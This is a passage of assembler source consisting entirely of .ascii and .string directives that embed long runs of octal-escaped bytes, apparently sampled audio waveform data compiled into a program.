"\032\033\"'#\032\032!\025\026\030 \031\033#261*)1;>'>;..2-35" .ascii "#3#$\032\001\377\372\357\341\341\354\334\321\327\317\323\322" .ascii "\340\334\350\371\357\371\372\364\347\353\327\334\326\321\330" .ascii "\313\321\317\324\306\333\340\326\341\336\353\356\346\364\374" .ascii "\371\003\f\034$(1/CQA[XeSDK./!\035\013\035\022\376\001\376\374" .ascii "\337\334\352\341\345\350\331\345\351\337\346\352\353\372\350" .ascii "\360\372\353\350\344\333\334\342\343\314\325\335\305\277\305" .ascii "\316\312\321\316\320\334\334\316\316\324\340\342\340\344\351" .ascii "\360\361\355\355\360\352\351\345\370\352\352\352\343\360\354" .ascii "\333\355\365\350\352\351\360\346\366\370\363\004\021\002\t\024" .ascii "$\032\025\025\037&\021\035\b\023\006\372\350\351\355\327\332" .ascii "\334\327\315\327\324\340\340\343\364\365\377\017\007\006\023" .ascii "\022\016\017\031'\030\031\f\006\024\377\002\376\n\004\361\367" .ascii "\361\362\364\361\371\365\373\b\001\r\024\027\026\024$$$#01(-" .ascii "+%((\033$\"$\025\027\035\036\032\022 \035\033\"!\034. \033,2" .ascii "8:4175(" .string "*''\032\002\022\007" .string "\372\361\373\363\351\364\356\354\364\354\352\353\355\353\341\341\337\316\306\311\312\300\300\300\277\314\320\277\306\326\322\324\340\362\363\376\367\363\002" .string "\017\027\031\"')/8C68;24%\035\032\022\016\376\365\377\371\357\351\352\362\363\355\373\377" .string "\t\375\f\r\021\t\r\035\027\016\006\023\007\006\003\374\364\360\362\337\323\344\340\320\330\323\323\325\325\331\327\332\336\336\335\353\360\353\352\362\365\353\355\351\354\345\335\336\337\340\324\322\323\332\317\311\314\316\322\276\300\316\310\317\341\316\334\360\344\362\366\377\001\371\377\007\005\002\373\365\365\361\360\351\353\356\351\346\357\367\363\361\375\005\004\017\030\031!-/\"*>1163*),\036%$\027\026\025\036\016\016\025\017\024\024\034\035\037\031\031\024\035&\037\032\036)\034\036\036\035\025\017\016\007\007\004\371\370\367\365\357\352\363\362\370\363\361\365\003\007\001\003\031\030\n\022\031!\021\033\036\032\025\023\016\f\017\377\370\367\377\364\345\346\356\362\350\361\362\360\370\367\367\364\377\372\354\357\365\353\353\350\350\362\350\357\360\363\373\373\364" .ascii "\f\007\r\n\031\020\r\032\030%#--3A5/991(#!\026\033\t\377\004" .ascii "\004\370\353\367\361\356\355\353\357\350\352\356\350\356\366" .ascii "\360\357\362\365\355\352\362\360\350\337\337\335\327\324\316" .ascii "\310\320\320\311\305\324\324\303\314\322\325\326\334\344\337" .ascii "\342\360\351\353\367\365\371\357\367\374\365\367\357\350\347" .ascii "\352\337\344\352\337\331\331\336\340\331\336\344\342\345\353" .ascii "\353\355\367\373\372\376\r\r\t\f\024\020\007\376\363\024\030" .ascii "\332\321\370)\0325\"\324\373\355\327\354\367\337\370\030\377" .ascii "\376\355\027\026\006+.@\345\360\b\251\312\274\345;\006\351\003" .ascii "\030\r\343\272\315\334\364.\022\003\351\336\346\365\373\306\327" .ascii "\361\371\366\347\022\031\342\343\315\262\314\323\277\250\313" .ascii "\312\310\355\344\347\366\352\332\332\326\335\304\322\327\350" .ascii "\017\375\372\352\334\363\021\370\377\022\030\034\027\031\016" .ascii ".4\037\033)T3!+19),\0311PCPQWhR^MOP7,\023\024\030\027#6\035\"" .ascii "&\022\007\f\022\371\357\362\354\356\351\334\325\321\316\261\243" .ascii "\256\317\344\333\337\336\342\354\325\311\323\331\345\330\310" .ascii "\336\363\013\003\362\370\371\005\004\366\b\"\033$%%\027\035\021" .ascii "\370\366\366\377\373\376\b\n\b" .string "\027\r\b\031*\032\020\025\033\037\013\375\377\020\033\033\002\004\022\026\022\017%&\027\005\346\340\362\346\326\322\336\354\362\372\367\366\373\373\354\336\337\350\336\322\330\341\360\363\344\315\315\326\336\334\316\332\344\340\342\337\346\370\372\360\341\355\001\366\353\351\355\001\004\362\364\t\037##+ATMG>BF8!\033%*/7=FL>;23A:,((0,' \013\003\354\334\344\372\022\026\021\016\031\"\026\005\375\375\004\366\351\367\b\022\003\360\351\362\372\356\345\350\373\002\366\360\360\354\346\340\315\302\303\304\274\261\271\301\310\316\305\312\323\332\327\314\313\325\330\316\304\313\330\344\343\316\322\347\372\377\374\007\025\025\001\365\365\373\003\365\350\375\024\033\031\024\036''\"\027\031!\037\027\030&1.#\035\030\037)\037\023\033%&$ '03+\034\034' \013\375\003\007\004\371\357\373\020\024\t\006\027&\034\020\b\t\013\001\355\336\342\361\364\357\365" .ascii "\003\376\366\361\365\376\371\352\346\360\366" .string "\360\345\331\313\276\265\252\251\303\335\345\347\355\372\b\t\004\375\005\027\023\t\021%2*\033\030!--!$6@4+,.*\037\016\002\001\003\373\355\360\375\002\001\004\006\017\031\025\n\007\013\016\003\367\364\370\376\370\351\344\363\002\376\365\372\002\375\356\335\324\327\334\320\277\307\333\340\325\321\331\341\343\334\322\325\343\344\334\335\351\360\357\347\335\334\344\350\337\326\336\352\354\353\351\361\374\004\003\370\372\007\005\366\355\361\373\375\371\363\001\031%\034\033.>=4.050\035\017\030'(!$173,'.87-*26.!\020\377\366\354\337\335\361\t\017\017\024\037-0&\034!.+\034\033)0%\024\n\022\034\030\013\013\032\"\030\n\b\t\006\371\345\330\331\333\315\277\300\311\316\316\315\316\327\342\340\324\320\325\327\315\302\273\276\304\302\264\261\303\324\324\316\323\335\342\331\314\304\313\324\312\273\301\325\333\324\316\324\336\345\341\332\340\361\370\364\365" .string "\n\013\006\375\375\005\f\004\376\006\023\031\032\036$0<;22<=.\"\"(,%\035$8@96CPQH@?DA-\037&41**164-'-75($'&\033\b\363\340\327\315\277\271\310\332\341\343\350\363\002\t\001\367\376\r\013\377\375\b\016\007\370\360\366\001\376\362\361\377\006\375\362\354\355\354\341\316\302\305\305\270\257\261\271\277\302\306\310\323\341\343\332\332\340\343\336\325\317\322\330\325\312\310\330\346\346\343\345\354\363\357\341\330\341\350\337\323\330\346\352\346\344\346\360\371\370\364\373\013\022\022\026\035#&#\033\031\036 \031\024\030\035\"(((1>=44;:0)$(-*\"&4:75<CE?7473#\032\037\"\036\033\033\033\033\034\030\023\026\033\031\024\022\017\013\005\370\345\324\312\304\273\271\301\313\325\334\337\345\361\372\365\360\367\001" .string "\374\375\001\002" .string "\370\360\363\372\366\360\362\371\372\366\362\356\355\354\344\331\323\322\315\305\303\303\304\310\317\322\323\332\343\344\342\343\345\344\343\340\330\330\334\333\324\324\337\347\351\351\353\357\365\363\350\345\355\357\347\344\351\356\357\357\355\355\363\370\366\365\375\005\t\r\023\027\032\036\035\031\030\033\032\030\031\031\034$*))4=;79;95.),0*$'01..1562+,.) \037\"! #\"\037!\"\037\034\036\036\034\034\030\021\013\007\372\346\327\316\307\277\276\300\307\322\330\331\340\356\364\362\364\375\003\005\007\t\t\r\r\005" .ascii "\003\004\377\373\375\374\371\367\364\357\353\347\340\331\325" .ascii "\316\307\305\305\301\300\306\314\316\320\327\334\337\343\343" .ascii "\341\343\347\342\333\334\336\332\326\327\333\337\341\341\337" .ascii "\343\345" .string "\340\331\333\334\331\327\331\333\333\337\340\337\341\347\350\350\356\365\370\375\006\f\016\021\026\026\025\024\023\023\025\024\021\024\034\036\035\"*--/0020*)//**/21235884342,+,*(++(()'%&%#%&\037\031\027\022\005\366\353\344\334\330\325\326\337\347\350\353\367\377\001\003\t\016\022\026\030\027\033\036\031\023\023\023\r\n\n\t\004\003\002\376\372\367\362\355\352\343\333\330\331\324\316\320\324\325\326\331\332\336\343\343\336\337\343\340\330\326\327\325\321\320\320\322\325\326\324\325\331\327\322\322\324\320\316\320\320\317\320\322\321\321\323\322\321\326\333\333\334\344\353\355\360\364\367\371\372\370\370\374\376\373\374\003\b\t\f\022\026\032\035\036\035!\"\035\032\035\037\032\031\033\034\032\033\034\035\036\037\035\036! \034\036!! #&&'('(**&'*' \035\032\021\005\373\361\351\344\336\333\340\347\352\355\366" .string "\005\n\022\030\036%*,175123.*)(# \036\032\026\023\016\b\006\002\372\364\364\361\354\353\355\356\360\363\364\366\373\377\374\373" .ascii "\001\373\367\370\365\362\357\355\354\354\355\352\350\352\351" .ascii "\344\342\342\336\333\333\333\331\331\332\330\330\333\332\327" .ascii "\331\337\340\336\344\353\356\360\363\366\371\373\372\366\370" .ascii "\374\371\366\371\375\375\376\001\003\005\n\013\t\n\016\f\b\t" .ascii "\013\b\005\007\b\006\005\006\006\006\007\005\004\007\b\004\002" .ascii "\005\007\004\004\006\007\007\t\007\005\007\n\005\002\006\007" .ascii "\002\375\374\367\357\347\336\325\320\313\306\306\313\317\320" .ascii "\326\340" .string "\346\353\363\372" .string "\007\016\021\025\035\037\033\033\036\036\030\026\027\025\021\020\016\013\n\b\003\001\001\375\367\366\366\363\360\362\366\370\374\373\017\371\374\364\351\034\013\020\343\353\354\330\343\326\372\373\371\374\005\370\003\365\350\344\373\002\371\017\006\017\006\363\r\b\031\017\327\032\005\003" .string "\343\344\350\362\004\006" .string "\027\n\003\365\r\001\b\001 \"\026&$2\031-7=JVO;82-*-8\037*! *\005\021\t\370\020\020\016-\002\373\016\377\024\b\n\r\005\032\021\006\r\037\033\025!\024\002" .string "\361\341\323\324\350\326\345\351\344\336\333\370\340\343\360\340\007\377\360\013\006\005\003\007\004\f\b\020\023\t\021\r\013\002\022\002\370\371\002\b\355\365\353\347\352\350\355\354\350\350\344\337\346\336\341\340\346\337\324\354\327\324\326\303\326\324\322\350\331\323\345\325\326\325\331\336\331\347\344\352\356\347\342\346\352\341\342\350\346\336\333\340\337\343\344\345\356\354\360\357\362\357\356\350\356\372\366\t\n\r\033\r\017\037\026*+!+,.!&$\022\036\037\037\" \035\013\006\t\017\004\t\017\003\b\005" .string "\377\001\007\b\r\033\030\027\023\016\r\017\n\020\027\f\023\004\365\365\352\343\346\353\356\357\376\372\372\372\367\367\374\f\017\022\030 \031\027\034\033\025\033\037\037\"\037 \024\023\031\024\032 \035!\026\017\016\006\013\n\t\021\023\020\t\006\377\362\362\365\377\376\375\375\363\353\347\345\343\351\360\354\355\370\370\370\361\357\365\373\004\t\b\n\005\375\375\365" .string "\374\367\003\376\370\370\365\354\353\356\362\371\377\004\376\372\370\370\367\372\007\n\027\037\036 ## &.46440)%\034\036\037\036$\036\030\023\b\002\002\374\377\003\004\007\004" .string "\371\366\371\375\002\t\022\022\f\013\b\003\001" .string "\377\003\003\375\363\350\341\331\321\320\330\333\337\336\336\341\334\340\343\346\364\376\376\004\b\005" .string "\377\001\002\t\013\f\r\t\003\373\373\375\374" .string "\003\007\003\377\367\357\356\355\354\357\363\370\363\354\351\344\343\336\337\345\345\343\345\333\326\325\314\316\323\331\336\336\341\340\334\327\327\336\343\350\352\354\356\354\345\340\336\341\342\344\350\352\352\344\340\335\334\342\345\352\357\363\363\354\355\356\353\360\371" .string "\t\017\020\021\020\023\023\026\036')'(' \034\031\030\033\035\036\032\026\020\t\001\377\002\003\005\t\t\006\004\377\375\376\003\005\007\020\022\016\r\b\007\005\003\007\006\007\003\373\361\353\351\343\341\346\353\357\360\360\361\360\362\366\373\006\017\023\024\026\026\017\016\021\022\025\030\034\033\030\027\017\r\017\021\025\027\032\034\027\020\r\013\n\f\f\016\022\021\n\003\001\375\370\370\374\375\372\370\363\353\347\345\345\346\356\364\365\366\370\366\362\362\365\372\001\005\006\007\006\002\373\367\373\374\373\376" .string "\376\372\366\361\357\362\367\371\374\002\004\377\374\376\377\002\t\022\031\037#!\"%&'-6:9960+&%%'(\"\034\032\022\t\005\006\007\t\013\f\013\t\006\001\001\007\n\r\022\026\025\020\016\013\007\b\t\b\007\004\376\363\352\346\341\336\341\347\353\353\353\352\352\354\356\362\373\006\013\f\016\017\013\t\t\013\016\023\026\024\022\020\013\005\005\t\n\013\016\017\013\005" .string "\374\373\375\376\376\001\002\375\365\360\356\352\350\354\355\354\353\346\337\333\332\331\331\337\346\350\347\347\346\342\341\343\346\353\360\361\360\357\355\346\342\342\344\345\346\350\350\345\342\336\334\340\345\350\353\360\364\361\355\357\360\364\371" .string "\005\013\017\016\r\016\021\021\025\033\037 \037\034\030\024\021\017\016\021\022\r\t\007\003\374\367\371\372\374\375\375\375\373\371\366\364\371\375\376" .string "\003\002\377\374\371\366\365\366\364\361\357\353\342\333\331\326\324\326\332\336\340\342\343\345\350\354\360\366\377\005\005\007\b\b\005\005\007\b\n\f\n\007\b\005" .string "\377\002\004\004\005\007\005\002\377\375\374\376" .string "\377" .string "\001\376\371\366\364\362\360\360\357\357\356\353\345\342\343\342\340\343\351\352\351\352\353\352\352\353\355\360\363\365\363\363\362\356\353\353\354\354\354\355\355\353\353\351\350\353\360\362\363\370\374\374\373\375\001\004\b\r\021\026\032\033\033\035!!\"&))(&#!\037\034\032\032\033\027\022\021\017\n\007\b\t\t\n\013\013\013\f\t\t\f\017\020\020\022\023\021\016\f\t\007\006\002\376\373\370\360\352\350\346\343\343\346\351\352\356\360\363\370\375" .string "\006\016\023\025\027\032\033\033\033\033\034\036\036\033\031\032\030\023\022\024\023\022\022\022\020\016\r\n\t\n\013\t\t\n\t\005\003\002" .string "\377\377\376\375\375\372\367\366\370\366\364\366\372\372\371\371\372\371\371\371\370\371\373\373\367\366\366\363\360\357\357\357\357\357\357\360\361\361\361\365\372\373\375\002\007\007\b\f\017\021\025\030\032\036!! \"$##$%$$!\036\035\034\031\026\027\027\024\021\022\020\r\f\r\r\r\016\017\016\020\020\016\r\017\020\017\017\017\016\f\t\005\002\001\376\370\363\362\356\347\343\342\337\335\337\341\343\346\352\355\361\367\374\377\004\013\017\021\024\026\026\026\026\025\025\025\024\020\017\020\r\t\t\n\b\007\007\007\006\006\006\003\003\004\004\002\002\003\001\376\375\374\371\370\366\365\364\363\361\355\356\356\353\352\354\356\355\355\356\356\356\357\356\355\357\360\356\353\353\353\350\345\344\343\343\342\342\342\343\345\344\345\351\355\356\361\366\371\372\375\001\003\007\n\f\016\022\025\024\025\027\030\027\027\030\030\027\026\023\021\021\017\013\t\n\b\005\003\004\002" .string "" .string "\377\377" .string "\002\001\001\004\004\002\003\005\005\003\004\004\003\001\376\373\370\366\362\354\351\347\341\334\331\327\324\323\324\324\327\333\336\340\345\354\360\363\372" .string "\003\006\t\f\r\016\016\r\016\017\f\n\013\n\007\004\005\004\002\001\001" .string "\377\377\375\373\374\375\372\371\371\372\367\366\365\364\362\362\360\356\357\357\354\354\355\355\353\353\355\355\356\356\357\356\357\356\354\353\354\354\350\346\346\344\340\336\334\333\333\332\332\332\336\337\337\343\350\353\356\362\367\372\376\002\005\b\f\016\017\022\026\026\025\026\030\026\025\025\024\023\022\020\r\r\r\n\007\007\007\005\004\004\004\004\004\004\004\005\007\007\006\t\n\t\b\t\n\b\007\007\005\004\001\376\373\371\366\360\354\352\346\341\336\334\332\330\330\330\332\336\341\344\350\356\363\367\374\002\007\t\r\020\021\023\024\023\023\024\022\020\017\020\r\013\013\n\t\b\b\007\007\b\007\004\005\007\005\003\003\004\002" .string "\377\376\375\374\372\370\367\370\366\364\364\365\364\363\365\365\365\366\367\366\370\366\363\356\357\355\353\351\354\354\356\356\362\363\365\370\366\370\371\374\367\373\370\372\355\363\334\t\374\337\327\345\036\0228\017\356\f\r\375\037\016\024\023\367\344\377\373\t\021\025&'6\317\020\325\241\274\301\020\030\317\335\021\374\025\300\336\364\350,> \007\034\f\377\374\377\341\332\341\333\366\360\350\315\306\335\315\311\310\316\302\345\370\323\362\366\361\026\353\326\356\311\331\274\266\326\343\005\366\362" .string "\371\367\013\357\375\022\023\376\362 \026\020$($A`K6AYH,3(04 %834>*PNL>\036E1 \035\034F7 #\017\013\023\037\013\365\013\024\361\361\346\326\355\317\265\251\242\304\307\252\313\336\327\333\330\300\343\360\334\365\334\376\026 \030\365\030\007\345\364\367\351\017\022\362\r\031\036\025\017\002\003\r\372\366\371\035\036" .string "\005\022\030\021&\017\013332-\021\022(\017#\035\001\t\360\357" .string "\013,\013\364\372\350\b\373\335\350\n\001\372\032\034\003\002\377\334\321\327\347\303\274\343\340\354\351\343\337\337\335\271\335\336\323\343\310\315\323\344" .string "\363\371\b\013\031\n\006\024\017\030\n\363\371\373\377\345\373\b\025,279BBA\034;I11GIKY1<@<T>08F;1%*-\n\362\306\340\374\351\350\377\377\013\035\370" .ascii "\032\n" .string "\002\004\007\026,5-\030\001\005\375\336\334\360\343\363\362\323\365\354\330\341\311\327\333\324\304\252\273\305\274\312\303\312\355\315\310\322\346\351\353\352\322\351\356\366\343\331\322\324\315\320\361\364\007\374\371\365\t\007\366\001\373\0323#%)\036%\035\030\022\031\035\376\376\032\024,/$.33\037&\024\020\026\035\027\032.7,\027+D64.\020,\037\002\005" .string "\377" .string "\356\351\372\003\026\b\373\005\f!\004\367\001\001\371\370\376\372\030\r\374\360\374\001\370\366\347\353\353\375\361\351\356\353\333\255\247\256\270\317\277\313\350\355\007\374\350\013\032 '\035A?9?\027(1\026\035\n\021\036\031\021\007%-(##0%\025\b\362\376\004\376\364\366\031\f\024\020\005\"\034\026\023\017\016\025\374\355\336\342\362\330\351\326\350\375\346\341\346\370\347\345\362\340\357\374\360\345\335\364\360\341\315\323\317\323\327\313\311\337\353\340\363\340\346\360\326\317\331\341\355\332\336\347\361\t\377\b\b\024\033\031\004\b\032\016\362\361\367\370\022\007\367\373\017\023\017\007\"6)0.&;; 3:;K6)1&6/'14;(\"% \004\354\323\323\363\365\354\357" .string "\007\024\026\031.;E=1BPI2'\037\022\032\375\367\007\004\n\013\372\b\025\n" .ascii "\355\367\360\346\332\312\327\330\305\303\301\305\323\331\333" .ascii "\322\345\356\356\332\311\327\320\310\300\263\267\277\273\266" .ascii "\267\310\320\331\315\274\335\341\322\323\314\337\352\354\341" .ascii "\330\353\344\322\320\314\320\345\331\331\352\363\371\004\005" .ascii "\366\003\021\016\003\005\024\031\005\001\f(+1/.GKH<08?(&#(.\035" .ascii "\030$/964>>NG>9FJ=FA?8'!\032&8'\031&3#\035\020\377\377\351\312" .ascii "\300\303\304\325\307\306\326\350\375\370\001\r\023\034\024\022" .ascii "\"%*\030\003\374\376\360\327\321\340\352\347\350\350\353\350" .ascii "\357\345\335\333\340\321\301\302\271\306\312\271\272\307\314" .ascii "\336\340\321\345\354\343\341\324" .string "\343\343\334\310\270\305\310\302\301\315\324\336\351\352\337\352\353\354\347\346\375\375\001\002\367\361\366\363\345\347\354\351\374\366\370\026\025\035\032\027$)$\035\025\033!\037#\035,>92:EEAE7CF5-\031$\036\033\031\034$(3()=848.9>22,&&\033\024\023\031\026\016\013\016\020\023\f\371\362\350\326\305\266\262\266\270\276\305\317\334\353\361\347\365\t\005\t\023\016\025\030\004\003\372\353\364\347\337\345\343\345\342\346\347\354\355\345\343\340\335\324\326\314\303\312\315\307\314\327\331\332\330\332\333\340\347\354\342\340\345\333\323\323\320\326\333\324\334\344\341\346\351\341\354\363\364\367\361\372\373\367\366\364\370\366\361\352\347\356\353\366\373\371\n\022\032\032\037(#\035\036\036\034 \"\035#0,=20@==?932*%\036&$%\034\030\037&$'/.54=277/,+0%\034\037\035\030\022\022\022\n\022\003" .string "\003\353\340\330\304\302\276\301\311\304\315\321\332\346\355\366\376\004\f\023\017\020\030\025\f\004\004" .string "\373\362\360\351\345\351\341\345\352\353\343\344\341\336\341\332\316\324\317\312\327\314\314\323\317\324\327\331\340\336\343\332\335\337\330\327\324\317\315\327\327\322\322\330\326\327\335\340\337\347\354\352\346\353\354\354\353\351\342\340\347\336\337\346\341\347\356\362" .string "\005\020\016\r\030\027\035\032\026\035\027\026\033\036\" /2/;;:412**)$ \"!\035#+\"*,)554815<9<62+%% \037' \030\031\031\020\r\t\365\360\344\335\333\326\335\334\333\346\351\354\365" .string "\002\004\026\025\031#\034%%\031 \026\020\n" .string "\376\371\374\371\363\367\361\356\365\361\356\356\360\351\337\341\334\327\325\323\321\317\325\335\331\331\331\335\333\333\332\325\335\323\317\323\314\313\320\313\312\317\321\330\331\323\324\325\326\325\331\336\331\331\331\325\313\314\316\307\303\312\324\325\332\343\350\351\363\364\370\377\001\003\377\005\003\006\n\007\r\021\020\034\036\033\035\035\034\033\035\032\031\030\024\n\016\022\020\016\021\025\030\035!\033\037&&#(1050/*((\"!\"\033\034\033\026\032\017\013\t\373\366\360\350\345\340\344\345\350\365\370\376\006\013\017\024\037&,03788/)'$\033\030\031\024\020\021\022\013\020\f\f\017" .string "\t\006\375\376\367\362\363\365\364\365\365\362\356\364\363\363\371\367\367\361\361\355\354\351\345\346\345\350\351\350\350\351\346\347\346\350\347\344\346\341\344\342\334\335\327\324\327\317\320\327\323\331\334\341\351\356\366\370\373\373\373\373\374" .string "\374\377\004\004\006\007\f\n\b\f\007\006\f\t\b\007\004\003\001\001\375\377\002\372\374" .string "\374\003\004\001\t\b\n\016\f\020\016\016\f\016\016\t\b\004\003\002\373\371\371\363\365\364\357\350\342\332\323\315\312\311\310\316\321\325\335\341\345\361\367\373\b\n\023\031\027\033 \032\034\031\027\023\021\r\007\b\006\005\003\004\001" .string "\371\375\370\372\364\366\360\370\364\376\357\007\021(\003\334\022\350\030\362\336\347=\n\024\035\350*$!\035N\020\030'1\374\027\033H7\331\335\265\364\337\370\371\344\344\317\332\337\344\367\360\337\362\354\021\374\004\374\331\364\322\n\361\350\367\371$\0307-*0\024\376\b\374\365\335\317\342\312\004\b\342" .string "\001\351\366\003\301\312\320\252\265\367\321\354\360\273\373\352\351\f=\022DS>R=)\013\024(=\017!\005\334\362\360\357\361\330\334\004\362\370\344\354\005\376\005\0251" .string "\r\376\362\r\371\361\032)\027M\02733\026!\023'\"S\"(\"\034=\025\356\340\363\340\023\377\f\367\321\324\266\324\311\326\307\355\305\267\364\371\n\004\025\r7\03508\0367(E*0\362(\016\323\374\342\001\353\377\367\035\001\001\006\336\372\353\374\001\006\343\300\317\270\300\310\302\350\310\275\317\302\352\336\325\343\344\353\376\004\323\356\352\351\f'9SO>K.J\036\375" .string "\363\374\001\f\347\360\335\320\323\330\335\366\376\345\033\t\002\372\362\001\354\341\005\375\326\344\307\325\364\355\375\013\022\016+58<8GW^PM\":\035\025\031\025\037 -\0217\013\f\363\332\344\362\357\334\375\322\330\315\322\326\314\277\302\316\332\004\364\375\370\361\374\005\005\025#\344\002\030\fM;7LELL5=0\032\034! \031\n\326\337\266\301\305\304\305\305\273\256\333\264\321\317\316\342\362\371\377\371\324\322\276\321\351\345\340\351\337\353\366\367\n\362\375\370\376\001\f\372\342!\005\r !'7/&+\004\006\343\326\320\342\327\335\322\304\322\262\333\325\350\344\360\353\372(\377\030\b\b\021$!&\022\357\007\367\006\n\n\030.\0230L4H@?=EON.\037\020\001\025\024\027\027\"\026\f\030" .string "\360\347\353\320\345\366\334\327\330\356\310\322\310\306\305\311\331\350\377\346\366\347\353\367\t\377\007\004\362\023\0359O6)I0II/:&) .\033\017\370\330\331\307\317\321\316\306\314\275\315\347\322\347\337\324\352\366\355\344\320\303\304\313\323\316\320\301\323\317\342\364\343\347\342\337\362\371\362\001\340\341\n\f#=3\0363+42\017\n\354\357\360\370\354\364\333\314\331\331\353\356\377\356\n\373\t\030\377\t\377\t\002\020\375\343\355\322\331\345\343\347\355\357\001\003\033$\034+'5IU<M&$))BCPHH6<\036 \022\004\013\034%\016\026\373\362\360\342\333\324\305\307\333\326\347\327\341\344\331\322\334\354\307\347\315\320\365\375\013\024\032\024%\031$ \030\031\026\027\" \003\001\350\342\350\351\360\361\346\340\361\345" .ascii "\007\004\024\024\022\033)\020\016\362\357\353\350\356\340\330" .ascii "\311" .ascii "\330\316\337\321\311\275\307\313\275\325\271\310\265\306\345" .ascii "\341\347\363\357\360\367\345\366\334\340\331\326\344\353\370" .ascii "\344\354\331\343\364\376\032\031\033-45E?=>;8?=;/\006\n\025\033" .ascii "\021\023\016\f$\023,%\036 \")-2\017\f\006\374\002\017\001\026" .ascii "\004\372\021\001\007\367\356\341\355\362\374\361\354\377\331" .ascii "\336\341\333\333\334\333\342\367\371\013\t\375\003\024\024\034" .ascii "\034\034$\007$;;2'+\"8>K(\030&\033!\030\026\366\351\322\321\321" .ascii "\317\312\307\304\302\332\313\342\342\340\327\344\366\376\362" .ascii "\340\334\305\276\306\333\274\313\272\304\334\305\331\314\307" .ascii "\326\341\332\351\346\334\351\342\367\002\r\017\031\r\020\031" .ascii "\t \006\377\005\006\b\f\373\004\376\360\t\373\020\022\037!#-" .ascii "0/+/,0*-\034\005\376\356\354\363\361\345\356\351\374\006\372" .ascii "\022\006\b\t\027\021\033\017\373\t\371\t\024!\022\032\r\022\031" .ascii "\f\026\004\013\007\021\017\031\022\377\376\351\361\342\351\356" .ascii "\362\357\005\n\b \007\025\005\034\034!/\034\036\025(,&!2%,$\034" .ascii " \020\022\013\f\376\001\353\332\322\277\307\306\300\274\314\272" .ascii "\313\322\311\357\320\343\356\345\357\357\347\325\337\323\330" .ascii "\316\332\330\327\334\340\351\333\350\341\344\346\356\354\366" .ascii "\355\351\364\352\375\001\r\006\016\f\023\027\007\002\t\005\372" .ascii "\024\002\r\001\003\b\375\377\374\025\022\035\030.%%4(-&+\037" .ascii "\"\n\001\375\355\364\364\362\364\366\364\004\n\006\n\t\b\021" .ascii "\"\034\034\n\370\013\372\004\022\r\t\027\r\017\031\b\021\003" .ascii "\004\b\r\b\t\365\355\346\330\332\331\336\345\366\356\003\001" .ascii "\005\024\026\026\030\034\037\"\030\035 (+)),&12\027\033\032" .ascii "\032\032\022\b\004\350\334\333\314\322\320\321\317\333\323\343" .ascii "\341\341\343\337\352\353\360\354\350\331\326\310\311\302\324" .ascii "\317\304\341\327\346\331\322\333\316\325\331\336\335\345\327" .ascii "\336\341\330\342\353\356\356\374\360\372\366\364\371\371\375" .ascii "\007\n\005\r\372\004\003\376\r\023 ).1873<C;B</3 \035\030\f\t" .ascii "\016\021\032\032\023%\032\032\034\037\037#$\031\035\t\n\007\005" .ascii "\n\f\020\021\023\b\016\001\001\373\371\375\373\374\346\345\315" .ascii "\317\302\257\304\307\302\320\340\333\356\355\365\370\375\t\t" .ascii "\023\t\023\t\020\023\017\031\036 #*!,!!! \031\036\031\013\n\357" .ascii "\361\356\353" .string "\356\364\364\371\371\376\002\376\004\f\022\017\031\020\370\375\356\343\353\335\350\357\344\352\364\355\361\354\345\347\345\342\350\342\331\335\314\317\315\317\325\333\330\341\344\333\343\330\333\333\344\346\357\351\346\354\341\344\333\350\360\377\376\013\025\026!\035(\"&!+!\031\025\001\003\375\005\n\024\023\035\037\035(\"&*0-84).\037#\037&)+30.'/$ \027\036\025\020\023\374\365\346\326\321\322\321\344\341\350\357\357\375\376\002\004\r\017\030\r\t\013\002\007\003\007\t\022\016\024\023\t\016\001\002\376\004\373\373\357\344\336\312\322\306\312\313\331\326\335\341\332\344\342\347\364\367\357\373\347\350\347\331\322\332\333\342\356\340\367\361\356\360\351\356\360\361\361\367\352\351\346\333\342\343\351\356\371\366\376\374\371\377\376\005\t\t\r\027\006\t\004\376\005\b\r\025'#.-/--316.3 \033\025\t\004\004\f\n\032\027\034\025\026\032\024\035\033!\032 \023\016\n" .string "\005\005\n\016\025\016\023\013\005\007\001\376\376\377\361\360\344\331\313\300\272\270\301\314\330\316\342\344\344\355\352\373\377" .string "\b\017\002\006\001\376\005\006\023\022 \032#\035\021\031\020\025\025\031\013\017\375\367\357\345\350\352\355\364\376\371\001" .string "\375\003\007\007\006\006\026\366\b\365\347\352\273\337\376\022,\02694\b\005\373\373\316\373\344\366\333\311\325\311\327\337\357\370\030\372)\363\t\022\355\354\346\343\367\365\334\317\325\370\342" .string "\005\0374<*\025\0230\027" .string "\021\017\r\016\b\340\350\351\357\366\007 \036\013\032\r" .string "'\005\n\021\002\022\016\370\361\365\360\003\r\023$F+\016\027 \035\031\r\372" .string "\376\343\276\304\317\310\275\321\343\372\032\t" .ascii "\006\024.\017\t \f\032\022\355\b\376\005\033\b*=@@0.,0$\004\020" .ascii "\030\376\367\337\336\342\336\353" .string "\341\005\023'\034\006\r\001\020\006\377\371\374\371\344\311\333\325\335\350\316\375\007\013\013\003\376\377\002\365\346\337\352\320\312\270\273\324\323\313\317\346\365\372\356\361\355\356\365\364\350\365\376\351\342\312\322\351\344\354\361\b'' !\"/'\030\021\t\024\t\371\356\362\001\373\356\001\023$*%$$/ \030\020\031\034\t\001\345\363\003\003\013\025!5<*.)/\027\006\002\377\t\354\330\305\307\321\322\316\327\354\007\013\376\020\030\035\026\t\t\022\033\t\377\370\002\013\f\025\0375AC/06+\031\013\005\004\r\362\347\337\346\351\343\344\365\r\026\027\377\r\016\017\002\356\353\366\362\326\327\312\322\326\331\327\345\001\b\007\370\007\006\377\355\331\327\343\337\305\300\270\301\306\306\274\333\362\364\372\352\362\374\371\352\344\346\363\362\341\333\331\351\351\342\355\016!.3$01*\033\020\t\025\016\364\354\347\366\372\365\366\025%-+ +,#\026\020\f\033\023\376\367\365" .string "\376\001\006\0362;4&.)\036\005\375\371\371\350\325\315\306\322\313\312\322\362\004\r\b\005\025\030\023\t\t\r\036\f\373" .ascii "\001\r\r\013\0222=C6+6-\036\f\t\001\n\367\342\340\342\350\344" .ascii "\343\353\006\022\033\013\b\023\r\003\367\363\362\372\344\320" .ascii "\317\323\332\330\331\351\b\017\023\007\001\t\002" .string "\363\341\341\342\344\313\277\273\276\305\303\304\324\362\371\374\361\366\376\372\360\346\352\363\370\340\327\333\342\354\354\361\f'-4$)1(\030\013\r\016\f\365\351\347\362\363\361\366\017&#,\035 